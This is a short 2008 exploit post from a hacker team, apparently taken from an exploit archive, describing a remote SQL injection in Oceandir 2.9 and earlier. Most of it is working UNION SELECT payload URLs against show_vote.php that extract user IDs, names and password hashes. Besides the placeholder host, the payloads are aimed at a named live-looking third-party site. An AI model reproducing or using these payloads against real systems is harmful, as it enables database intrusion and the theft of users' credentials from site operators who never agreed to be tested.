Oceandir <= 2.9 (show_vote.php id) Remote SQL Injection Vulnerability

2008-09-20 22:01:04

/**
* @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
* @author JEEN HACKER TEAM [ Jeen + Secertry ]
* @cost 250$
* @script http://www.oceandir.com
* @copyright 2008
* @homepage http://www.hackteach.org/cc/teach.php
* @email [email protected] , [email protected]
*/

Exploit :
~user
http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
~passwd
http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users

Example :
####
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
####

Greetz : www.hackteach.org user's

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.